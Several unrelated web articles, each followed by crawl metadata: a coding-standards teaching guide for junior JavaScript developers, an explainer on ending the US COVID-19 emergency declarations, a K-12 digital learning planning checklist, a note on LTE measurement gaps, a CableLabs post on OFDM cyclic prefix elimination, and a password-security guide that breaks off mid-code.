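The difference between restating the "what" and recording the "why" fits in a few lines (the rate-limiting backstory and the 30-second cap are hypothetical requirements invented for this sketch):

```javascript
// Over-commenting (adds nothing the code doesn't already say):
//   attempt += 1;  // add one to attempt

function retryDelayMs(attempt) {
  // Why, not what: the payment gateway rate-limits bursts, so we back
  // off exponentially, and we cap at 30 s (an assumed limit for this
  // sketch) to keep the checkout spinner from appearing frozen.
  return Math.min(30000, 1000 * 2 ** attempt);
}

console.log(retryDelayMs(0)); // 1000
console.log(retryDelayMs(10)); // 30000
```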
1.4. Error Handling
Effective error handling is crucial for building reliable and robust applications. It involves anticipating and coding for possible errors that might occur during execution.
- Use Exceptions Rather Than Return Codes: Exceptions can’t be ignored easily and separate the error-handling code from the main logic.
- Provide Useful Error Messages: When throwing exceptions, provide messages that can help diagnose issues quickly.
- Consistency: Use a consistent strategy across the whole application for managing exceptions.
- Fail Fast: Where possible, make the code fail as soon as an error condition is detected. This simplifies debugging and often makes the system more secure.
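A hedged sketch of these guidelines in one place (the validation rules shown are invented for illustration):

```javascript
// Fail fast with an exception, not a return code, and say what went wrong.
function parsePort(value) {
  const port = Number(value);
  if (!Number.isInteger(port) || port < 1 || port > 65535) {
    // Useful message: includes the offending value and the valid range.
    throw new RangeError(`Invalid port "${value}": expected integer 1-65535`);
  }
  return port;
}

console.log(parsePort("8080")); // 8080

try {
  parsePort("eighty");
} catch (err) {
  console.log(err.message); // Invalid port "eighty": expected integer 1-65535
}
```

Because the function throws immediately at the first bad input, the error surfaces at its source rather than as a mysterious failure several calls later.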
1.5. Architecture Guidelines
Architecture guidelines ensure that the code not only meets the current requirements but is also adaptable to changing needs without requiring a complete rewrite.
- Modularity: Design the system as a set of modular components, which can be developed, tested, reused, and updated independently.
- Layering: Use layers to separate concerns, such as separating the data access layer from the business logic layer and the presentation layer.
- Use Design Patterns Where Appropriate: Design patterns are tried and tested solutions to common problems. Using them can help avoid subtle issues that can cause major problems.
- Code Reusability: Aim for reusability through components and modules. This reduces duplication, which in turn reduces the potential for errors and maintenance overhead.
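A compact sketch of modularity and layering: the data layer knows only about storage, the business layer only about rules, and neither knows about presentation (the in-memory store stands in for a real database):

```javascript
// Data access layer: storage details only (an in-memory stand-in here).
const userStore = {
  users: new Map(),
  save(user) { this.users.set(user.id, user); },
  findById(id) { return this.users.get(id); },
};

// Business logic layer: rules only, with storage injected for reusability.
function registerUser(store, id, email) {
  if (!email.includes("@")) {
    throw new Error(`Invalid email: ${email}`);
  }
  store.save({ id, email });
  return store.findById(id);
}

// Presentation layer (here, just the console) talks to the business layer.
const created = registerUser(userStore, 1, "ada@example.com");
console.log(created.email); // ada@example.com
```

Swapping the in-memory store for a database module would leave the business layer untouched, which is exactly the payoff layering is meant to provide.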
Adhering to these guidelines helps in creating a codebase that is efficient, understandable, and maintainable. Remember, the ultimate goal of coding standards is to enhance productivity and foster a code environment that allows teams to collaborate more effectively.
In the next chapter, we’ll explore how to conduct this orchestra, creating a symphony of coders who play in perfect harmony through the effective teaching of coding standards. Stay tuned, and remember, in coding as in music, practice doesn’t make perfect, perfect practice makes perfect!
2. Conducting the Orchestra: Teaching Coding Standards Effectively
As the conductor of an orchestra shapes the overall sound of the ensemble, so too must educators shape the coding habits of junior web developers. Teaching coding standards effectively isn’t just about dictating rules; it’s about engaging with your ensemble—your students—in a way that inspires them to embrace these practices as their own.
2.1. Start with the Why
Before diving into the hows, start with the whys. Explain the chaos of a codebase where everyone codes in their own style—akin to an orchestra where every tuba player decides on a different tune. Highlight how standards improve readability, reduce errors, and make maintenance easier, much like how sheet music keeps the orchestra in sync.
2.2. Interactive Examples
Use real-world scenarios to illustrate good and bad practices. Just as a side-by-side comparison of a symphony’s performance with and without a conductor can be enlightening, comparing well-structured code against a messy one can highlight the benefits of following standards.
2.3. Peer Reviews
Encourage code reviews among peers to foster a community learning environment. Like section rehearsals where musicians fine-tune their performance together, code reviews help developers learn from each other and enforce standards naturally.
2.4. Consistent Feedback
Offer continuous feedback, not unlike a conductor’s subtle cues during a performance. This can be through regular check-ins or automated feedback tools. The goal is to guide, not to scold.
2.5. Gamify the Learning
Incorporate elements of gamification like badges or scores for adhering to standards. It’s like turning practice sessions into a playful competition, but instead of striving for the loudest note, the aim is for the cleanest code.
3. Tools of the Trade: Linters, Formatters, and Other Aides
Just as a musician relies on their instrument’s tuner or a metronome to ensure their performance is pitch-perfect, developers have their own tools to ensure their code is clean, efficient, and in tune with established standards.
3.1. Linters

Linters, such as ESLint in the JavaScript world, are the critics. They read your code without running it and flag deviations from the agreed standards: unused variables, inconsistent naming, suspicious constructs. Think of a critic who points out every note played out of tune, before the audience ever hears it.
3.2. Formatters

If linters are the critics, formatters are the stylists. Tools like Prettier take your raw, unpolished code and reformat it into a stylistically consistent piece. It’s as if you handed your handwritten score to a copyist who returns a beautifully notated manuscript.
3.3. Integrated Development Environments (IDEs)
These are the full orchestral scores that contain all the parts for each instrument. IDEs like Visual Studio Code or JetBrains WebStorm come with built-in support for linters and formatters, and often provide real-time feedback and suggestions, much like a conductor providing real-time cues to an orchestra.
3.4. Version Control Systems
Think of these like rehearsal recordings. Tools like Git help manage changes in the codebase, allowing developers to revert to earlier versions if something goes awry, akin to a conductor reviewing a rehearsal tape and deciding to take a different approach to a particular passage.
3.5. Automated Code Review Tools
These can be likened to session recordings reviewed by an expert. Services like CodeClimate or SonarQube provide automated code reviews, highlighting potential issues and suggesting improvements based on predefined standards.
By leveraging these tools, we can ensure that every piece of code not only performs well but also plays beautifully in the grand symphony of a project. Remember, the goal is to make the code sing, and these tools are here to tune the voices.
4. Rehearsing the Code: Practice Techniques for Juniors
Every musician knows that the key to a flawless performance is relentless practice. Similarly, junior web developers must hone their coding skills through constant practice, focused not just on solving problems, but on solving them right. Here’s how to make these practice sessions both beneficial and engaging:
4.1. Code Katas
Like scales in music practice, code katas are small, repeatable exercises that help developers refine their skills through repetition and variation. These exercises should focus on applying coding standards in a variety of scenarios, reinforcing the habits that make great code.
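As a concrete illustration, here is a small kata in the spirit described: solve a tiny problem while consciously applying the naming, formatting and error-handling standards from Chapter 1 (the exercise itself is invented):

```javascript
// Kata: format a duration in seconds as "XmYs", deliberately practicing
// descriptive names, consistent style and fail-fast input checks.
function formatDuration(totalSeconds) {
  if (!Number.isInteger(totalSeconds) || totalSeconds < 0) {
    throw new RangeError(`Expected a non-negative integer, got ${totalSeconds}`);
  }
  const minutes = Math.floor(totalSeconds / 60);
  const seconds = totalSeconds % 60;
  return `${minutes}m ${seconds}s`;
}

console.log(formatDuration(125)); // 2m 5s
```

Repeating a kata like this with small variations (hours, zero-padding, localized labels) builds the habits until they are automatic.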
4.2. Pair Programming
Think of this as a duet, where two developers share a single workstation. One writes the code, while the other reviews each line as it is written. This not only improves code quality but also enhances learning, as the ‘observer’ can suggest adherence to coding standards in real-time.
4.3. Project-Based Learning
Assign small projects that require juniors to start from scratch, building their codebase with adherence to standards from the ground up. It’s like composing a short piece of music—they get to understand how each part fits into the larger whole.
4.4. Refactoring Sessions
Organize sessions where the sole focus is to refactor existing code to improve readability and efficiency while adhering to coding standards. This is akin to revising a piece to perfection, ensuring every note is in its right place.
4.5. Regular Quizzes
Implement short, frequent quizzes on coding standards. Like theory tests in music education, these help reinforce the knowledge and ensure juniors can recall and apply the standards when needed.
5. Encore: Cultivating a Culture of Quality and Consistency
The grand finale in teaching coding standards is establishing a culture where quality and consistency are not just encouraged but celebrated. Here’s how to cultivate this environment:
5.1. Recognize and Reward
Just as standing ovations celebrate outstanding musical performances, recognize developers who consistently adhere to coding standards. Implement reward systems, like ‘Coder of the Month’, based on code quality metrics.
5.2. Consistent Messaging
From onboarding to daily stand-ups, emphasize the importance of coding standards. Just as motifs are repeated throughout a symphony to reinforce thematic elements, repeat your commitment to standards to embed them in your team’s psyche.
5.3. Mentorship Programs
Pair junior developers with seasoned mentors, much like apprentices with maestros. These relationships can provide ongoing support, guidance, and feedback, crucial for the development of a junior’s coding finesse.
5.4. Continuous Improvement
Encourage a mindset of continuous learning and improvement. Hold workshops, attend seminars, and review the latest coding standards and practices. Like musicians who continuously adapt to new music styles and techniques, developers should evolve with the changing tech landscape.
5.5. Open Discussions
Foster an environment where juniors feel comfortable discussing their code openly, whether it’s questions about best practices or seeking advice on handling specific challenges. Think of it as a group critique session, where everyone learns from each other’s compositions and critiques.
By embracing these practices, you not only teach coding standards effectively but also build a vibrant culture of excellence and harmony in your development team. Remember, the goal is not just to play the notes right but to make the music feel right—to make the code not just functional but exceptional. | <urn:uuid:41d20b16-6256-4121-b4f7-5343c843ae4c> | CC-MAIN-2024-38 | https://networkencyclopedia.com/coding-standards-a-symphony-of-syntax/ | 2024-09-12T12:46:53Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651457.35/warc/CC-MAIN-20240912110742-20240912140742-00728.warc.gz | en | 0.906257 | 2,790 | 3.765625 | 4 |
What will the U.S. government's next steps be for COVID-19?
President Joe Biden announced on Jan. 30, 2023, that he intends to end both the national emergency and the public health emergency declarations related to COVID-19 on May 11, 2023.
Biden’s announcement came on the same day that the World Health Organization said it still considers the COVID-19 pandemic to be a public health emergency of international concern, or PHEIC, a status that is reassessed every three months. The WHO’s advisory committee noted that although the pandemic is at a turning point, “COVID-19 remains a dangerous infectious disease with the capacity to cause substantial damage to health and health systems.”
What does ending the emergency phase of the COVID-19 pandemic mean?
Ending the federal emergency reflects both a scientific and political judgment that the acute phase of the COVID-19 pandemic crisis has ended and that special federal resources are no longer needed to prevent disease transmission across borders.
In practical terms, it means that two declarations – the federal Public Health Emergency, first declared on Jan. 31, 2020, and the COVID-19 national emergency that President Donald Trump announced on March 13, 2020 – will be allowed to expire in May 2023.
Declaring those emergencies enabled the federal government to cut through a mountain of red tape, with the goal of responding to the pandemic more efficiently. For instance, the declarations allowed funds to be made available so that federal agencies could direct personnel, equipment, supplies and services to state and local governments wherever they were needed. In addition, the declarations made resources available to launch investigations into the “cause, treatment or prevention” of COVID-19 and to enter into contracts with other organizations to meet needs stemming from the emergency.
The emergency status also allowed the federal government to make health care more widely available by suspending many requirements for accessing Medicare, Medicaid and the Children’s Health Program. And they made it possible for people to receive free COVID-19 testing, treatment and vaccines and enabled Medicaid and Medicare to more easily cover telehealth services.
What policy changes will occur once the emergency is declared over?
The end to the federal emergency could substantially reduce the number of people insured under Medicaid. Before the pandemic, states required people to prove every year that they met income and other eligibility requirements.
In March 2020, Congress enacted a continuous enrollment provision in Medicaid that prevented states from removing anyone from their rolls during the pandemic. In a December 2022 appropriations bill, Congress passed a provision that will end continuous enrollment on March 31, 2023.
The Biden administration has defended this time frame as sufficient to ensure that “patients do not lose access to care unpredictably” and that state Medicaid budgets – which have been infused with emergency funds since 2020 – “don’t face a radical cliff.” But many people with Medicaid may be unaware of these changes until they actually lose their benefits.
Some states have already indicated that they will begin disenrolling members in April 2023 or require members to apply to be considered for renewal. This could result in between 5 million and 14 million people losing coverage.
People with Medicare do not have to worry about losing their benefits, since this program is age-based, not income-based. The array of telehealth services that Medicare began covering during the pandemic will continue to be covered through December 2023. Medicare coverage for many telehealth services could also be made permanent after this year.
The end of the emergency could additionally curb access to COVID-19 drugs, tests and vaccines. Federal emergency funding for free treatment or vaccination will end when the emergency status is lifted on May 11. If such programs are to continue, the cost will fall to state and local health agencies or insurance companies.
We are concerned that the withdrawal of federal emergency funds for vaccination may further slow the already sluggish uptake of boosters. As of Jan. 25, 2023, about 20% of the population ages 5 and up and only 40.1% of those 65 and older – who are at the highest risk of death from COVID-19 – had received an updated bivalent booster dose. Once the emergency ends, measures that allowed a broad array of health providers – from pharmacist interns to retired nurses and even veterinarians – to administer vaccines will expire, which could lead to decreased access to vaccination in many parts of the U.S.
What does this mean for the status of the pandemic?
A pandemic declaration represents an assessment that human transmission of a disease, whether well known or novel, is “extraordinary,” that it constitutes a public health risk to two or more states and that controlling it requires an international response.
At some point the WHO will end its pandemic declaration. On Jan. 30, 2023, World Health Organization Director-General Tedros Adhanom Ghebreyesus described the pandemic as being “at a transition point.” But the WHO’s assessment is that the risks are still considerable. Ghebreyesus noted that COVID-19 continues to strain health care systems, exacerbate health care workforce shortages and exceed surveillance system capacities.
The U.S. remains one of the global COVID-19 hot spots. With more than 3,500 hospitalizations per week on average in January 2023, and 3,452 deaths per week as of early February 2023, the U.S. has among the highest deaths per capita in the world.
How does the Biden administration’s stance differ from the WHO’s position?
In some ways they are very similar. The WHO is looking at the pandemic from a global perspective while the Biden administration is examining it from a national perspective. The WHO’s stance reflects the assessment that the world is not sufficiently vaccinated, that health care systems remain vulnerable and that unchecked disease transmission in some parts of the world should remain a source of international concern and attention.
China’s massive outbreak after the lifting of its zero-COVID policy in early December 2022 has received a great deal of media attention. But less noted is the fact that vaccination rates across African nations average 40%, and that vaccination rates are very low in countries that are experiencing conflict, such as Syria, where only 15% of the population has received any COVID-19 vaccine.
The WHO’s continuation of the global pandemic status signals that there is more international coordination and work to be done. In contrast, the Biden administration is making a social and political judgment that it is time to wind down the federal role.
Biden’s order will not affect state-level or local-level emergency declarations. These declarations have allowed states to allocate resources to meet pandemic needs and have included provisions allowing them to respond to surges in COVID-19 cases by allowing out-of-state physicians and other health care providers to practice in person and through telehealth.
Almost all U.S. states, however, have ended their own public health emergency declarations. Eight states – California, Colorado, Delaware, Georgia, Illinois, New Mexico, Rhode Island and Texas – still have emergency declarations in effect, but all of them will expire by the end of February 2023 unless renewed.
While some states may choose to make permanent some COVID-era emergency standards, such as looser restrictions on telemedicine or out-of-state health providers, it could be a long time before either politicians or the public regain an appetite for any emergency orders directly related to COVID-19. | <urn:uuid:cb08664e-4534-42cb-88c1-09d82808b7c1> | CC-MAIN-2024-38 | https://www.nextgov.com/ideas/2023/02/bidens-plan-ending-emergency-declaration-covid-19-signals-pivotal-point-pandemic4-questions-answered/382608/?oref=ng-next-story | 2024-09-13T17:24:51Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651535.66/warc/CC-MAIN-20240913165920-20240913195920-00628.warc.gz | en | 0.959801 | 1,571 | 2.8125 | 3 |
Technology Planning: Creating a Digital K-12 Environment
The Process of Improving the Digital Learning Process
As K-12 schools prepare to enhance their digital learning environments, educators must take a comprehensive approach toward ensuring the right infrastructure, technology and training components are in place every step of the way.
A Guide to Mapping Your Future of Learning Journey
Start at the beginning. Get clarity around your existing education landscape and what it will take to modernize your learning platforms.
- Envision your plan for the school and the district.
- Assess specialized hardware and audio/video equipment requirements.
- Identify tools and resources needed to achieve future-ready learning and the infrastructure to support them.
- Determine a standard format for content across all classes.
- Engage your online content development team to make learning more effective.
- Structure the learning program so students are focused on the task at hand.
- Conduct assessments to determine rollout readiness.
Pre- and During Implementation
Formulate a rollout plan. Be sure all departments and district entities are involved.
- Clarify usage policies and restrictions.
- Identify process owners and processes to ensure alignment to rollout readiness.
- Develop and implement a communication plan to all stakeholders (why, how, what).
- Provide professional learning aligned to rollout readiness (administration, staff, students, parents).
- Determine security requirements (e.g., authentication, authorization) and SAML integration.
- Assess from a cost perspective whether servers need to be up and running all the time.
Now that your solution is in place, be sure your K-12 institution is ready to address any current changes or issues.
- Consider managed services.
- Measure ROI through analytics (device, usage, break/fix, implementation goals).
- Follow up on all processes to ensure success/improvement areas are identified.
- Survey students and administrators on what can be improved.
- Optimize to create greater value for the end user (price/performance).
- Maintain a DevOps-based mindset for updating the course content.
IT Asset Management
Adopting education technology isn’t a linear process. It’s a cyclical endeavor that requires educators to prepare for future upgrades, technology advancements and more.
- Ensure you have a documented process for device replacement or device additions.
- Consider buyback options for older hardware.
- Determine and act upon the optimum hardware refresh cycle for your technology platform.
- Be prepared to address emerging technology developments around augmented reality, virtual reality and the Internet of Things.
Next step: Give us a call to get started on your journey.
During RRC_CONNECTED mode, if the eNodeB decides that the UE needs to perform LTE inter-frequency and inter-RAT monitoring activities, it will provide the UE with a measurement configuration which includes a monitoring gap pattern sequence.
Similar mechanisms exist in UMTS (known as ‘Compressed Mode gaps’ and ‘FACH Measurement Occasions’ depending on the state and capabilities of the UE) and in GSM (known as GSM Idle frames in GSM Dedicated and Packet Transfer Mode states).
During the monitoring gaps, UE reception and transmission activities with the serving cell are interrupted.
The Main Reasons for Using Monitoring Gap Patterns Are as Follows:
• The same LTE receiver can be used both to perform inter-frequency monitoring during the gaps and to receive data from the serving cell when there is no transmission gap.
• The presence of monitoring gaps allows the design of UEs with a single, reconfigurable receiver. A reconfigurable receiver can be used to receive data and to perform inter- RAT activity, but typically not simultaneously.
• Even if a UE has multiple receivers to perform inter-RAT monitoring activity (e.g. one LTE receiver, one UMTS receiver and one GSM receiver) there are some band configurations for which monitoring gaps are still required in the uplink direction.
In particular, these are useful when the uplink carrier used for transmission is immediately adjacent to the frequency band which the UE needs to monitor.
There is always a significant power difference between the inter-RAT signal to be measured and the signal transmitted by the UE.
The amount of receive filtering which can be provided, within the cost and size limitations of a UE, is not sufficient to filter out the transmitted signal at the input of the receiver front end, so the transmit signal leaks into the receiver band creating interference which saturates the radio front end stages.
This interference desensitizes the radio receiver which is being used to detect inter-RAT cells. Rather than address each scenario (i.e. each pair of frequency bands) with a specific solution, uplink gaps in LTE are configured in the same way for all scenarios.
LTE monitoring gap patterns contain gaps every N LTE frames (i.e., the gap periodicity is a multiple of 10 ms), with a 6 ms duration for these gaps.
A single monitoring gap pattern is used to monitor all possible RATs (inter-frequency LTE FDD and TDD, UMTS FDD, GSM, TD-SCDMA, CDMA2000 1x and CDMA2000 HRPD).
Different gap periodicities are used to trade off between UE inter-frequency and inter- RAT monitoring performance, UE data throughput and efficient utilization of transmission resources.
In general, cell identification performance increases as the monitoring gap density increases, while the ability of the UE to transmit and receive data decreases as the monitoring gap density increases.
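This trade-off can be quantified directly. As a concrete data point, the Release 8 requirements in 3GPP TS 36.133 define gap patterns with 40 ms and 80 ms repetition periods, each using the 6 ms gap length; the sketch below (illustrative, not normative) computes the share of serving-cell time the gaps consume:

```javascript
// Fraction of serving-cell transmission/reception time consumed by
// measurement gaps: gapLengthMs / gapRepetitionPeriodMs.
function gapOverhead(gapLengthMs, gapRepetitionPeriodMs) {
  return gapLengthMs / gapRepetitionPeriodMs;
}

const GAP_LENGTH_MS = 6; // fixed 6 ms gap duration

// Rel-8 gap patterns use 40 ms and 80 ms repetition periods.
for (const periodMs of [40, 80]) {
  const pct = (100 * gapOverhead(GAP_LENGTH_MS, periodMs)).toFixed(1);
  console.log(`Period ${periodMs} ms: ${pct}% of serving-cell time lost`);
}
// Period 40 ms: 15.0% ...  Period 80 ms: 7.5% ...
```

The denser 40 ms pattern roughly halves the time needed to identify neighbour cells, at the cost of twice the throughput penalty on the serving cell.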
Most RATs (LTE, UMTS FDD, TD-SCDMA, CDMA2000) broadcast sufficient pilot and synchronization information to enable a UE to synchronize and perform measurements within a period slightly in excess of 5 ms. This is because most RATs transmit their downlink synchronization signals at least once every 5 ms.
For example, in LTE the PSS and SSS symbols are transmitted every 5 ms. A 6 ms gap therefore provides sufficient additional headroom to retune the receiver to the inter-frequency LTE carrier and back to the serving LTE carrier, and still to cope with the worst-case relative alignment between the gap and the cell to be identified.
3GPP Technical Specification 36.133, ‘Evolved Universal Terrestrial Radio Access (E-UTRA); Requirements for Support of Radio Resource Management (Release 8)’, www.3gpp.org.
3GPP Technical Specification 25.213, ‘Technical Specification Group Radio Access Network; Spreading and Modulation (FDD)’, www.3gpp.org.
3GPP Technical Specification 36.214, ‘Evolved Universal Terrestrial Radio Access (E-UTRA); Physical Layer – Measurements (Release 8)’, www.3gpp.org. | <urn:uuid:1a3ec7ac-b69d-4455-ae06-a83c404cf6de> | CC-MAIN-2024-38 | https://moniem-tech.com/2018/05/18/111/ | 2024-09-17T11:38:28Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651773.64/warc/CC-MAIN-20240917104423-20240917134423-00328.warc.gz | en | 0.904997 | 879 | 2.6875 | 3 |
Sharing Bandwidth: Cyclic Prefix Elimination
Unfortunately, there is only so much over-the-air wireless bandwidth, and it must be shared between a lot of folks. And the situation is not getting any better. While you can usually run another wire or fiber optic cable between two locations to get more bandwidth, if you have a wireless application you must share this scarce resource.
New applications, such as IoT (the internet of things), 3-D virtual reality headsets and ever-richer cell phone apps, are demanding more and more bandwidth. With cable subscribers watching video on portable devices such as tablets and phones, interference problems like frozen pictures and tiling are becoming more frequent. More than half of customer complaints are caused by wireless problems, and the most common culprit is Wi-Fi interference, frequently from a neighbor’s service.
Solutions to the Problem
- One solution to the problem of more bandwidth is to use cellular technology and make the cell size smaller. Have you ever observed that out in the country cell towers are tall for a long reach? But in crowded cities, they are much closer to the ground, and the antennas are pointed downward. This is to reduce cell diameter in highly populated areas, allowing bandwidth reuse in non-overlapping cells. Transmitted power is also reduced for small cells to limit signal reach, thus reducing interference. However, large numbers of cell sites are expensive to deploy and maintain - and the bandwidth itself can be expensive. In the latest FCC bandwidth auction, the 600MHz band in the United States was sold for almost $20 billion!
- Other techniques to increase bandwidth include steerable beams and a technique called MIMO (multiple input, multiple output). This is a system for reusing the spectrum with more unique signals in the same air, by transmitting two or more signals on physically separated antennas. At a receive site, sophisticated signal processing, using two or more antennas, separates the signals.
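To make the MIMO idea concrete, here is a toy two-antenna example: two symbols are mixed by an invented 2x2 channel matrix, and the receiver separates them by inverting that matrix (a simple "zero-forcing" receiver — real systems use far more sophisticated processing, and the channel values here are made up):

```python
# A toy 2x2 MIMO link: two signals sent on two antennas mix in the air
# (modeled as a 2x2 channel matrix H); the receiver, knowing H, inverts
# it to separate the streams.
def solve2x2(H, y):
    """Solve H @ x = y for a 2x2 matrix H (zero-forcing receiver)."""
    (a, b), (c, d) = H
    det = a * d - b * c
    return ((d * y[0] - b * y[1]) / det,
            (-c * y[0] + a * y[1]) / det)

x = (1.0, -1.0)                       # the two transmitted symbols
H = ((0.9, 0.3), (0.2, 1.1))          # assumed channel gains
y = (H[0][0] * x[0] + H[0][1] * x[1], # what each receive antenna hears
     H[1][0] * x[0] + H[1][1] * x[1])
x_hat = solve2x2(H, y)
print(x_hat)                          # recovers (1.0, -1.0)
```

Two symbols went over the air at the same time, on the same frequency — and both came back out intact. That is the spectrum reuse MIMO buys.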
CableLabs Innovation: Cyclic Prefix Elimination
CableLabs researchers are constantly looking for efficiency improvements, and they have found one way to improve wireless signals to make them use less bandwidth. This method, called “OFDM CP Elimination” (the full mouthful is Orthogonal Frequency Division Multiplex Cyclic Prefix Elimination!), allows the data to be sent in less time, increasing the resolution of pictures, and reducing the time for screen updates. Their method eliminates an overhead called a “Cyclic Prefix”, thereby improving efficiency by up to 25%. A side benefit of finishing transmissions earlier is increasing battery life for handheld devices.
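The "up to 25%" figure is easy to sanity-check against a Wi-Fi-style OFDM symbol. The 3.2 µs / 0.8 µs timing below is the classic 802.11a/g long-CP case, used here as an assumed example — the blog post does not specify these numbers:

```python
# Cyclic-prefix overhead in a Wi-Fi-style OFDM symbol (illustrative).
# With a 3.2 us useful symbol and a 0.8 us cyclic prefix, the CP is 25%
# of the useful symbol time -- the efficiency that CP elimination can
# reclaim in the best case.
useful_us = 3.2
cp_us = 0.8

overhead_vs_useful = cp_us / useful_us          # 0.25
airtime_saved = cp_us / (useful_us + cp_us)     # 0.20 of total airtime
print(f"CP overhead: {overhead_vs_useful:.0%} of useful symbol time")
print(f"airtime reclaimed if eliminated: {airtime_saved:.0%}")
```

Every symbol that finishes 20% sooner is 20% less time the radio spends transmitting — which is where the battery-life side benefit comes from.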
Interested in a deep dive into cyclic prefix elimination? Check out my video on the subject, my blog post "Getting Rid of a Big Communications Tax on OFDM Transmissions" and my technical paper in the December issue of the SCTE ISBE Journal titled "OFDM Cyclic Prefix Elimination."
CableLabs innovates to help our member companies provide better services to their customers, including higher data rates, higher reliability and lower latency. Subscribe to our blog to find out more.
The Dangers of Weak Passwords
When it comes to security, your password is the first barrier against unauthorised access. However, relying on weak password practices is like leaving the front door unlocked, inviting trouble. Just as a flimsy lock on a gate makes it easy for intruders to enter, an easily guessed or reused password opens the door for cybercriminals to exploit, putting your entire organisation at risk. No one is exempt from this threat.
Why Unique Passwords Matter
In a 2024 survey on password security, 30% of users reported experiencing a breach due to weak passwords. Over half (52.9%) admitted to sharing their passwords with colleagues, friends, or family, and nearly 46% confessed to reusing passwords across different platforms.
These aren’t just mistakes made by the general public. Even IT professionals fall into these traps. In 2022, it was revealed that 53% of IT experts share passwords via email, 41% do so over chat, and 31% through face-to-face conversations.
These figures highlight the grave risks associated with poor password practices. The potential consequences range from data breaches to blackmail involving sensitive personal information, and substantial financial losses. In cybersecurity, the question isn’t “if” an attack will happen, but “when”—and being unprepared can be costly.
The 2023 Verizon Data Breach Investigations Report emphasised that human error remains the leading cause of security incidents, underscoring the need for robust cybersecurity education. Effective cybersecurity begins with strong passwords and the reinforcement of good password habits.
How Hackers Exploit Passwords
There are two primary methods hackers use to compromise passwords: brute force attacks and credential stuffing, both of which pose significant risks.
Brute Force Attacks:
- Hackers try all possible password combinations to guess your password.
- They often start with common passwords or personal details.
- Simple passwords make their job easier.
Credential Stuffing:
- One data leak can lead to many security breaches.
- Hackers use stolen usernames and passwords from one website to try and log into others.
- If you reuse passwords across sites, this method can compromise multiple accounts.
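A quick back-of-envelope calculation shows why length and character variety blunt brute force. The guess rate below is an assumed figure for a well-resourced offline attacker:

```python
# Why length and character variety matter against brute force (illustrative).
# Assumes an offline attacker testing 10 billion guesses per second.
guesses_per_sec = 1e10

def years_to_exhaust(charset_size, length):
    keyspace = charset_size ** length
    return keyspace / guesses_per_sec / (3600 * 24 * 365)

print(f"8 lowercase letters : {years_to_exhaust(26, 8):.6f} years")
print(f"8 mixed chars (94)  : {years_to_exhaust(94, 8):.2f} years")
print(f"16 mixed chars (94) : {years_to_exhaust(94, 16):.3e} years")
```

An 8-character lowercase password falls in seconds; doubling the length with a full character set pushes the search far beyond any practical timescale. Credential stuffing, by contrast, skips the math entirely — which is why uniqueness matters as much as strength.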
In addition to these methods, hackers often use social engineering and phishing techniques to steal passwords. While it’s challenging to ensure that everyone in an organisation is always vigilant against these tactics, utilising a reliable password manager and practicing good password hygiene can greatly reduce the risk.
The Fallout of Poor Password Management
The consequences of poor password management are severe and far-reaching. A compromised password can lead to financial losses, unauthorised access to sensitive data, and damage to personal or organisational reputations. Cybercriminals with access to private information will exploit it for their own malicious purposes.
Importance of Complex Passwords:
- Use a mix of uppercase and lowercase letters, numbers, and special characters.
- Avoid using personal information like names or dates.
- The best passwords are random strings of characters without any personal connection.
Using Passphrases for Added Security:
- Passphrases are easier to remember but harder to crack than simple passwords.
- Example: “BlueSkyOceanBreeze” is stronger than “BlueSky.”
- Enhance security by swapping letters with numbers or symbols, like “Blu3SkY0c3@nBr33z3.”
- Choose passphrases that are memorable to you but not linked to personal details.
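The difference can be made concrete with a rough entropy estimate for the example passwords above, assuming the attacker must search the full character set in use:

```python
# Rough entropy comparison of the example passwords above. This assumes
# a brute-force attacker searching every combination over the character
# classes actually present in the password.
import math
import string

def entropy_bits(password):
    size = 0
    if any(c in string.ascii_lowercase for c in password): size += 26
    if any(c in string.ascii_uppercase for c in password): size += 26
    if any(c in string.digits for c in password):          size += 10
    if any(c in string.punctuation for c in password):     size += 32
    return len(password) * math.log2(size)

for pw in ("BlueSky", "BlueSkyOceanBreeze", "Blu3SkY0c3@nBr33z3"):
    print(f"{pw:22s} ~{entropy_bits(pw):5.1f} bits")
```

Length alone more than doubles the entropy; substituting numbers and symbols adds a further margin on top. (Real attackers also use dictionaries, so a passphrase of common words is somewhat weaker than this raw estimate suggests — another reason to avoid famous quotes.)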
Avoid Common Password Mistakes:
- Don’t use easy patterns like “123456,” obvious words like “password,” or important dates.
- Avoid using personal info that’s easy to find online, like your address or birthdate.
Dangers of Reusing Passwords:
- Reusing passwords across sites is risky; one breach can lead to multiple compromised accounts.
- Always use unique passwords for each account to stay secure.
Benefits of Password Managers:
- Password managers store your complex passwords securely.
- They help you maintain strong, unique passwords without needing to remember each one.
Enhancing Security with Multi-Factor Authentication (MFA):
- MFA adds another layer of security by requiring more than one form of verification.
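For a sense of how one common MFA factor works under the hood, here is a minimal sketch of the time-based one-time password (TOTP) scheme from RFC 6238, using only the Python standard library. The shared secret is, of course, made up:

```python
# Minimal TOTP (RFC 6238) sketch: the server and the user's phone share a
# secret and each derive a short code from the current 30-second window.
# An attacker with only the password still can't produce the code.
import hmac, hashlib, struct, time

def totp(secret: bytes, t=None, step=30, digits=6):
    counter = int((time.time() if t is None else t) // step)
    msg = struct.pack(">Q", counter)
    digest = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                      # dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return f"{code % 10 ** digits:0{digits}d}"

secret = b"example-shared-secret"   # hypothetical enrollment secret
print(totp(secret))                 # same code on both ends within 30 s
```

Because the code changes every 30 seconds and is derived from a secret that never crosses the network at login time, a phished or reused password alone is no longer enough.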
Securing Your Passwords with a Password Manager
The Advantages of a Password Manager
A password manager is a highly effective tool for managing identity and access. It stores your passwords in an encrypted vault, simplifying the process of maintaining strong password practices.
With most services requiring complex passwords, it’s easy to forget them. We all know someone who constantly uses the “Forgot your password?” option. A password manager eliminates this issue, allowing you to focus on your tasks without worrying about remembering passwords.
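A sketch of the core idea behind the encrypted vault: the vault key is derived from the master password with a deliberately slow key-derivation function, so the password itself is never stored. The parameters here are illustrative, not any particular product's:

```python
# How a password manager can turn a master password into a vault key:
# a slow key-derivation function (PBKDF2 here) plus a random salt.
# The salt is stored with the vault; the master password never is.
import hashlib
import os

def derive_vault_key(master_password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256",
                               master_password.encode(),
                               salt,
                               iterations=600_000)  # slow on purpose

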